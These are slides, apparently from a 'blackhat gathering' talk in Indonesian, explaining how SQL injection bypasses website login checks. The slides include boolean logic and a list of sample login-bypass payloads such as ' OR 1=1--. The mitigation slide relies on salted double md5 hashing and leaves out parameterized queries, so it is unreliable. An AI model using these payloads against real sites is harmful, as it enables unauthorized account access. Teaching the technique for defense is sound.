Presented on Surabaya Blackhat Gathering #2 "Hack a Website under 5 Minutes"
This presentasion, explain about Bypass Login Authentication using SQL Injection
2. • Adalah sebuah teknik yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori
aplikasi client.
BYPASS SQL INJECTION
3. • true AND true = true
true AND false = false
false AND false = false
false AND true = false
• "AND" membandingkan true dengan true. jika kedua terbanding
bernilai true, maka return true. jika salah satu atau kedua nya false,
maka return false.
• true OR true = true
true OR false = true
false OR true = true
false OR false = false
• jika salah satu TRUE, maka return akan memberikan TRUE.
FAKTOR PEMBANDING
4. • ‘Surabayablackhat' OR 1=1--‘
• Komentartembus’#
• katanyaheker' or true--
• NothingImposible' or 1=1--
• haruskreatifmengolahkata' OR 'a'='a'--
SAMPLE
5. • Andalkan Enkripsi password / merubah algoritma autentikasi login /
Sistem Filter.
Contoh Enkripsi:
Before
$input_password=$_POST[password];
After
$input_password=md5(md5($_POST[password]).md5(‘karakter
acak’));
Contoh Algoritma:
$contohsih=mysql_fetch_array($r);
if($jml_row >0 && ($contohsih[password]==$input_password))
PENANGGULANGAN